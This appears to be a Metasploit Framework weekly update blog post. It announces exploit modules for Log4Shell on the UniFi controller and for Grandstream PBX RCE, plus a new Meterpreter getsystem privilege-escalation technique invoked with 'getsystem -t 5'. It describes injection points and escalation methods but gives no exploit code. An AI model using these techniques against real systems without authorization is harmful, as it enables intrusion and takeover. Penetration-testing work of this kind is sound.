Last updated at Fri, 28 Jan 2022 20:00:53 GMT
I'm sure you know what's coming, more Log4Shell
For those wondering when the Log4Shell remediation nightmare will end, I'm afraid I can't give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the
/api/login page. Be sure to leverage the module’s
check function since scanners detecting header injection may not work.
A new getsystem technique for Meterpreter
smashery has done an amazing job working on giving us a fifth
getsystem technique on the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the
SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem technqiues this one also has the advantage of not starting services which is often an action that is identified as malicious. Users can run this elevation technique directory by using the
getsystem -t 5 command in Meterpreter. Now exploits that yield sessions LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.
New module content (2)
- Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 - A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to
rootlevel code execution.
- UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 - A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the
rememberfield of a POST request to the
/api/loginpage. Successful exploitation results in OS command execution in the context of the server application.
Enhancements and features
- #15904 from smashery - This PR adds the logic to support a fifth
getsystemoption using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
- #16020 from VanSnitza - The
exploit/scanner/auxiliary/scada/modbusclientmodule has been enhanced to support command 0x2B which gives clear text info about a device. Additionally the module's code has been updated to comply with RuboCop standards.
- #16090 from audibleblink - A new method
user_data_directoryhas been added to
lib/msf/base/config.rbto allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
- #16096 from zeroSteiner - The implementation of the
ListenerCommdatastore options have now been updated to support specifying
-1to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
- #16106 from bwatters-r7 - This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.
- #16054 from namaenonaimumei - This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
- #16104 from zeroSteiner - Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).